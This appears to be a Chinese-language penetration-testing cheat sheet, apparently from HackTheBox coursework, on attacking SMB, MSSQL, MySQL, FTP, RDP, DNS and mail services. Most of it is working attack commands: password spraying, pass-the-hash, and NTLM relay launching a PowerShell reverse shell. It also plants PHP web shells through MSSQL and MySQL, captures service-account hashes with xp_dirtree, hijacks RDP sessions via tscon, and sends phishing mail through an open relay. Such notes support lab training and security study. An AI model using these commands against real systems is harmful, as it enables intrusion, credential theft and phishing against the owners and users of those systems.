Attacking Common Services

SMB

TCP 445 用于直接通过 TCP/IP 传输的 SMB(常见于 SMBv2 和 SMBv3)

TCP/UDP 137-139 用于基于 NetBIOS 的 SMB(通常为 SMBv1)

Interact

运行 | 文件夹

1
\\192.168.220.129\share\

cmd | powershell

1
2
C:\> dir \\192.168.220.129\share\
PS C:\> Get-ChildItem \\192.168.220.129\share\

Mount SMB - CMD

1
2
3
4
5
6
7
8
9
10
# 连接到文件共享并将其内容映射到驱动器号 n
C:\> net use n: \\192.168.220.129\share [/user:uname passwd]

# 统计文件数量
C:\htb> dir n: /a-d /s /b | find /c ":\"

# 查找特定文件
C:\> dir n:\*cred* /s /b
# or
C:\> findstr /s /i cred n:\*.*

Mount SMB - Powershell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PS C:\> New-PSDrive -Name "N" -Root "\\192.168.220.129\share" -PSProvider "FileSystem"

# 凭证输入
PS C:\> $username = 'uname'
PS C:\> $password = 'passwd'
PS C:\> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\> New-PSDrive -Name "N" -Root "\\192.168.220.129\share" -PSProvider "FileSystem" -Credential $cred

# 切换驱动器
PS C:\> N:

# 统计文件数量(缩写gci)
PS N:\> (Get-ChildItem -File -Recurse | Measure-Object).Count
29302

# 查找特定文件
PS N:\> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

PS C:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

Mount SMB - Linux

1
2
3
4
5
6
7
8
9
10
11
$ sudo mkdir /mnt/Finance
$ sudo mount -t cifs //192.168.220.129/share /mnt/share -o username=uname,password=passwd,domain=. 

# 使用文件凭证
$ mount -t cifs //192.168.220.129/share /mnt/share -o credentials=/path/credentialfile

# 查找
$ find /mnt/Finance/ -name *cred*

# 匹配文件内容
$ grep -rn /mnt/Finance/ -ie cred

凭证文件结构

1
2
3
username=uname
password=passwd
domain=.

External

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sudo nmap 10.129.14.128 -sV -sC -p139,445

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)

Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-19T13:16:04
|_  start_date: N/A

null session

1
2
3
4
5
6
7
smbclient -N -L //10.129.14.128

# 枚举每个共享文件夹的权限列表
smbmap -H 10.129.14.128
	-r [path] 枚举共享文件夹中的所有文件 或 指定共享文件夹
	--download "notes\note.txt"
	--upload test.txt "notes\test.txt"

rpc

1
2
3
4
$ rpcclient -U'%' 10.10.110.17
rpcclient $> enumdomusers

./enum4linux-ng.py 10.10.11.45 -A -C

crack

1
hydra -L users.list -P pws.list smb://10.129.220.123

spraying

1
2
3
$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
# --continue-on-success 找到有效密码后继续喷洒
# --local-auth 本地验证(未加入域使用)

Internal

PsExec

1
impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

1
2
3
4
5
6
7
8
9
10
11
# 如果 --exec-method 没有定义,CrackMapExec 将尝试执行 atexec
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

# 枚举同一网络内所有机器上的登录用户
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

# SAM数据库提取哈希值
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

# 传递哈希 PTH
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Responder

1
2
# 网络投毒
sudo responder -I <interface name>

如果我们无法破解哈希,我们可以使用impacket-ntlmrelayx或 Responder MultiRelay.py将捕获的哈希中继到另一台机器。

1
2
3
4
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

# 反向shell Powershell #3 (Base64)
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <SNIP>'

MSSQL

TCP 1433 UDP 1434 | “hidden” TCP 2433

MSSQL默认系统模式/数据库:

  • master- 保存 SQL Server 实例的信息。
  • msdb- 由 SQL Server 代理使用。
  • model- 为每个新数据库复制一个模板数据库。
  • resource- 一个只读数据库,使系统对象在 sys 模式的服务器上的每个数据库中可见。
  • tempdb- 为 SQL 查询保留临时对象。

interact

如果我们不指定域或主机名,它将假定 SQL 身份验证并针对在 SQL Server 中创建的用户进行身份验证。相反,如果我们定义域或主机名,它将使用 Windows 身份验证。SERVERNAME\\accountname.\\accountname

1
2
3
4
5
6
# Linux - sqsh
sqsh -S 10.129.20.13 -U username -P Password

# Windows - sqlcmd
C:\> sqlcmd -S 10.129.20.13 -U username -P Password123
# sqlcmd需要在查询后使用GO来执行 SQL 语法。

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ nmap -Pn -sV -sC -p1433 10.10.10.125

Host discovery disabled (-Pn). All addresses will be marked 'up', and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-26 02:09 BST
Nmap scan report for 10.10.10.125
Host is up (0.0099s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: mssql-test
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: mssql-test.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-08-26T01:04:36
|_Not valid after:  2051-08-26T01:04:36
|_ssl-date: 2021-08-26T01:11:58+00:00; +2m05s from scanner time.

Host script results:
|_clock-skew: mean: 2m04s, deviation: 0s, median: 2m04s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

exec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 连接数据库后的命令执行,需要权限,xp_cmdshell默认情况下禁用
xp_cmdshell 'whoami'

# 开启,需要权限
-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  

-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  

-- To update the currently configured value for this feature.  
RECONFIGURE
GO

wirte

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 启用Ole 自动化程序(这需要管理员权限)
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# 创建文件
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

read

默认情况下,MSSQL允许读取操作系统中该帐户具有读取权限的任何文件。

1
2
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

Capture Hash

使用 xp_subdirs 或 xp_dirtree 未记录的存储过程窃取 MSSQL 服务帐户哈希,这些存储过程使用 SMB 协议从文件系统中检索指定父目录下的子目录列表。当我们使用其中一个存储过程并将其指向我们的 SMB 服务器时,目录监听功能将强制服务器进行身份验证并发送运行 SQL Server 的服务帐户的 NTLMv2 哈希。

首先需要启动Responderimpacket-smbserver

1
2
3
sudo responder -I tun0

sudo impacket-smbserver share ./ -smb2support

再执行xp_dirtreexp_subdirs查询

1
2
3
4
5
6
7
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO

# or

1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO

模拟现有用户

SQL Server 具有一项特殊权限,名为IMPERSONATE,允许执行用户承担其他用户或登录的权限,直到上下文重置或会话结束。

注意:建议EXECUTE AS LOGINmaster数据库中运行,因为默认情况下所有用户都有权访问该数据库。如果您尝试模拟的用户无权访问您正在连接的数据库,则会出现错误。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# 查看可以模仿的用户
1> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
2> GO
-----------------------------------------------
sa
ben
valentin


# 验证当前用户是否具有 sysadmin 权限;返回0,表示没有 sysadmin 权限
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

-----------
julio                                                                                                                    
(1 rows affected)

-----------
          0

(1 rows affected)                                                                           


# 模拟用户 sa
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

-----------
sa

(1 rows affected)

-----------
          1

(1 rows affected)


# 恢复操作并返回到之前的用户
REVERT

链接其他数据库

MSSQL有一个配置选项,称为链接服务器。链接服务器通常配置为允许数据库引擎执行包含另一个 SQL Server 实例或其他数据库产品(如 Oracle)中的表的 Transact-SQL 语句。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# 查看链接服务器
1> SELECT srvname, isremote FROM sysservers
2> GO

srvname                             isremote
----------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS          1
10.0.0.12\SQLEXPRESS                0

(2 rows affected)


# 查看连接的用户及其权限
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO

------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\SQLEXPRESS     Microsoft SQL Server 2019 (RTM sa_remote                                1

(1 rows affected)


# 读取文件
1> EXECUTE('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
2> GO

MySQL

TCP 3306

MySQL默认系统模式/数据库:

  • mysql- 是系统数据库,其中包含存储 MySQL 服务器所需信息的表
  • information_schema- 提供对数据库元数据的访问
  • performance_schema- 是一种用于在低级别监控 MySQL 服务器执行的功能
  • sys- 一组帮助 DBA 和开发人员解释性能模式收集的数据的对象

interact

1
2
3
4
5
# Linux - mysql
mysql -u username -pPassword -h 10.129.20.13

# Windows - mysql.exe
C:\> mysql.exe -u username -pPassword -h 10.129.20.13

nmap

1
nmap -Pn -sV -sC -p3306 10.10.10.125

wirte

1
2
3
4
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# 条件
mysql> show variables like "secure_file_priv";

read

1
mysql> select LOAD_FILE("/etc/passwd");

FTP

TCP 20 TCP 21

interact

1
2
3
4
ftp anonymous@10.129.20.13

# 下载所有文件
wget -m --no-passive ftp://anonymous@10.129.200.209:30021

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ sudo nmap -sC -sV -p 21 192.168.2.142 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 22:04 EDT
Nmap scan report for 192.168.2.142
Host is up (0.00054s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 1170     924            31 Mar 28  2001 .banner
| d--x--x--x   2 root     root         1024 Jan 14  2002 bin
| d--x--x--x   2 root     root         1024 Aug 10  1999 etc
| drwxr-srwt   2 1170     924          2048 Jul 19 18:48 incoming [NSE: writeable]
| d--x--x--x   2 root     root         1024 Jan 14  2002 lib
| drwxr-sr-x   2 1170     924          1024 Aug  5  2004 pub
|_Only 6 shown. Use --script-args ftp-anon.maxlist=-1 to see all.

anonymous

1
$ ftp anonymous@192.168.2.142

crack

1
2
3
hydra -L users.list -P pws.list ftp://10.129.220.123

medusa -M ftp -h 10.129.203.7 -u fiona -P /usr/share/wordlists/rockyou.txt

FTP 反弹攻击

假设我们的目标是暴露在互联网上的FTP_DMZ服务器。同一网络中的另一台设备Internal_DMZ未暴露在互联网上。我们可以利用与FTP_DMZ服务器的连接,使用 FTP 反弹攻击进行扫描Internal_DMZ,并获取有关服务器开放端口的信息。

现代 FTP 服务器默认包含防止此类攻击的保护措施,但如果现代 FTP 服务器中的这些功能配置错误,则服务器可能容易受到 FTP 反弹攻击。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT   STATE  SERVICE
80/tcp open http

<SNIP>

RDP

TCP/UDP 3389

interact

1
2
3
4
$ rdesktop -u admin -p password123 192.168.2.143

$ xfreerdp /v:192.168.2.143 /u:admin /p:password123
$ xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

nmap

1
2
3
4
5
6
7
8
9
$ nmap -Pn -p3389 192.168.2.143 

Host discovery disabled (-Pn). All addresses will be marked 'up', and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 04:20 BST
Nmap scan report for 192.168.2.143
Host is up (0.00037s latency).

PORT     STATE    SERVICE
3389/tcp open ms-wbt-server

spraying

1
2
3
hydra -L user.txt -P 'password123' RDP://目标IP
# or
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Hijacking Session

需要SYSTEM权限并使用 Microsoft tscon.exe二进制文件。

1
2
3
4
5
6
7
8
9
10
11
C:\> query user

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM


# tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
# 创建一个Windows服务,作为本地系统运行并以 SYSTEM 权限执行任何二进制文件
C:\> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\> net start sessionhijack

注意:此方法在 Server 2019 上不再有效。

PassTheHash (PtH)

Restricted Admin Mode 默认情况下,它是被禁用的,但在目标主机上需要启用它,否则就会报错。

可以通过在DisableRestrictedAdmin下添加新的注册表项(REG_DWORD)来启用此功能HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa

1
C:\> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

连接

1
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

DNS

TCP 53 UDP 53

nmap

1
2
3
4
5
6
7
8
$ nmap -p53 -Pn -sV -sC 10.10.110.213

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 03:47 EDT
Nmap scan report for 10.10.110.213
Host is up (0.017s latency).

PORT    STATE  SERVICE     VERSION
53/tcp  open   domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)

subdomain

1
2
3
4
5
gobuster vhost -u http://example.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# or

ffuf -w /path/to/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://example.htb -H 'Host: FUZZ.example.htb'

DNS Zone transfer

DNS 区域是特定组织或管理员管理的 DNS 命名空间的一部分。由于 DNS 包含多个 DNS 区域,因此 DNS 服务器利用 DNS 区域传输将其数据库的一部分复制到另一台 DNS 服务器。除非 DNS 服务器配置正确(限制哪些 IP 可以执行 DNS 区域传输),否则任何人都可以向 DNS 服务器索取其区域信息的副本,因为 DNS 区域传输不需要任何身份验证。此外,DNS 服务通常在 UDP 端口上运行;但是,在执行 DNS 区域传输时,它使用 TCP 端口进行可靠的数据传输。

攻击者可以利用此 DNS 区域传输漏洞来了解有关目标组织的 DNS 命名空间的更多信息,从而增加攻击面。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ dig AXFR @ns1.inlanefreight.htb inlanefreight.htb

; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb.         604800  IN      AAAA    ::1
inlanefrieght.htb.         604800  IN      NS      localhost.
inlanefrieght.htb.         604800  IN      A       10.129.110.22
admin.inlanefrieght.htb.   604800  IN      A       10.129.110.21
hr.inlanefrieght.htb.      604800  IN      A       10.129.110.25
support.inlanefrieght.htb. 604800  IN      A       10.129.110.28
inlanefrieght.htb.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)

枚举根域的所有 DNS 服务器并扫描 DNS 区域传输

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
$ fierce --domain zonetransfer.me

NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
               '172800 900 1209600 3600\n'
               '@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
               '@ 301 IN TXT '
               '"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
               '@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
               '@ 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM.\n'
               '@ 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM.\n'
               '@ 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM.\n'
               '@ 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM.\n'
               '@ 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM.\n'
               '@ 7200 IN MX 20 ASPMX5.GOOGLEMAIL.COM.\n'
               '@ 7200 IN A 5.196.105.14\n'
               '@ 7200 IN NS nsztm1.digi.ninja.\n'
               '@ 7200 IN NS nsztm2.digi.ninja.',
 <DNS name _acme-challenge>: '_acme-challenge 301 IN TXT '
                             '"6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI"',
 <DNS name _sip._tcp>: '_sip._tcp 14000 IN SRV 0 0 5060 www',
 <DNS name 14.105.196.5.IN-ADDR.ARPA>: '14.105.196.5.IN-ADDR.ARPA 7200 IN PTR '
                                       'www',
 <DNS name asfdbauthdns>: 'asfdbauthdns 7900 IN AFSDB 1 asfdbbox',
 <DNS name asfdbbox>: 'asfdbbox 7200 IN A 127.0.0.1',
 <DNS name asfdbvolume>: 'asfdbvolume 7800 IN AFSDB 1 asfdbbox',
 <DNS name canberra-office>: 'canberra-office 7200 IN A 202.14.81.230',
 <DNS name cmdexec>: 'cmdexec 300 IN TXT "; ls"',
 <DNS name contact>: 'contact 2592000 IN TXT "Remember to call or email Pippa '
                     'on +44 123 4567890 or pippa@zonetransfer.me when making '
                     'DNS changes"',
 <DNS name dc-office>: 'dc-office 7200 IN A 143.228.181.132',
 <DNS name deadbeef>: 'deadbeef 7201 IN AAAA dead:beaf::',
 <DNS name dr>: 'dr 300 IN LOC 53 20 56.558 N 1 38 33.526 W 0.00m',
 <DNS name DZC>: 'DZC 7200 IN TXT "AbCdEfG"',
 <DNS name email>: 'email 2222 IN NAPTR 1 1 "P" "E2U+email" "" '
                   'email.zonetransfer.me\n'
                   'email 7200 IN A 74.125.206.26',
 <DNS name Hello>: 'Hello 7200 IN TXT "Hi to Josh and all his class"',
 <DNS name home>: 'home 7200 IN A 127.0.0.1',
 <DNS name Info>: 'Info 7200 IN TXT "ZoneTransfer.me service provided by Robin '
                  'Wood - robin@digi.ninja. See '
                  'http://digi.ninja/projects/zonetransferme.php for more '
                  'information."',
 <DNS name internal>: 'internal 300 IN NS intns1\ninternal 300 IN NS intns2',
 <DNS name intns1>: 'intns1 300 IN A 81.4.108.41',
 <DNS name intns2>: 'intns2 300 IN A 167.88.42.94',
 <DNS name office>: 'office 7200 IN A 4.23.39.254',
 <DNS name ipv6actnow.org>: 'ipv6actnow.org 7200 IN AAAA '
                            '2001:67c:2e8:11::c100:1332',
...SNIP...

还有 DNS spoofing …

Email

识别邮箱服务器

1
2
3
4
5
6
7
8
$ host -t MX hackthebox.eu
hackthebox.eu mail is handled by 1 aspmx.l.google.com.

$ dig mx inlanefreight.com | grep "MX" | grep -v ";"
inlanefreight.com.      300     IN      MX      10 mail1.inlanefreight.com.

$ host -t A mail1.inlanefreight.htb.
mail1.inlanefreight.htb has address 10.129.14.128

如果目标是自定义邮件服务器,可以枚举以下端口

Port Service
TCP/25 SMTP 未加密
TCP/143 IMAP4 未加密
TCP/110 POP3 未加密
TCP/465 SMTP 加密
TCP/587 SMTP 加密/ TLS
TCP/993 IMAP4 加密
TCP/995 POP3 加密

nmap

1
2
3
4
5
6
7
8
9
10
$ sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-27 17:56 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: mail1.inlanefreight.htb, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
MAC Address: 00:00:00:00:00:00 (VMware)

telnet

枚举有效用户名 VRFY,EXPN,RCPT TO,USER

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ telnet 10.10.110.20 25

# VRFY 此命令指示接收 SMTP 服务器检查特定电子邮件用户名的有效性。
VRFY root
252 2.0.0 root

VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table

# EXPN 和 VRFY 类似,不同之处在于,当与分发列表一起使用时,它将列出该列表上的所有用户。
EXPN john
250 2.1.0 john@inlanefreight.htb

EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb

# RCPT TO 标识电子邮件消息的收件人。可以针对给定消息重复此命令多次,以将单个消息传递给多个收件人。
MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok

RCPT TO:kate
550 5.1.1 kate... User unknown

RCPT TO:john
250 2.1.5 john... Recipient ok

# 使用POP3协议根据服务实现枚举用户。
$ telnet 10.10.110.20 110

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready

USER julio

-ERR

USER john

+OK

smtp-user-enum

1
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

cloud

O365spray是一款针对 Microsoft Office 365(O365)的用户名枚举和密码喷洒工具。

1
2
3
python3 o365spray.py --validate --domain msplaintext.xyz

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

spraying

1
2
3
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Open Relay

开放中继是一种简单邮件传输协议 ( SMTP) 服务器,配置不当,允许未经身份验证的电子邮件中继。滥用此漏洞进行网络钓鱼,以不存在的用户身份发送电子邮件或伪造他人的电子邮件。

1
2
3
4
5
6
7
8
9
$ nmap -p25 -Pn --script smtp-open-relay 10.10.11.213

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-28 23:59 EDT
Nmap scan report for 10.10.11.213
Host is up (0.28s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (14/16 tests)

接下来,可以使用任何邮件客户端连接到邮件服务器并发送我们的电子邮件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213

=== Trying 10.10.11.213:25...
=== Connected to 10.10.11.213.
<-  220 mail.localdomain SMTP Mailer ready
 -> EHLO parrot
<-  250-mail.localdomain
<-  250-SIZE 33554432
<-  250-8BITMIME
<-  250-STARTTLS
<-  250-AUTH LOGIN PLAIN CRAM-MD5 CRAM-SHA1
<-  250 HELP
 -> MAIL FROM:<notifications@inlanefreight.com>
<-  250 OK
 -> RCPT TO:<employees@inlanefreight.com>
<-  250 OK
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Thu, 29 Oct 2020 01:36:06 -0400
 -> To: employees@inlanefreight.com
 -> From: notifications@inlanefreight.com
 -> Subject: Company Notification
 -> Message-Id: <20201029013606.775675@parrot>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/
 -> 
 -> 
 -> .
<-  250 OK
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.
⬆︎TOP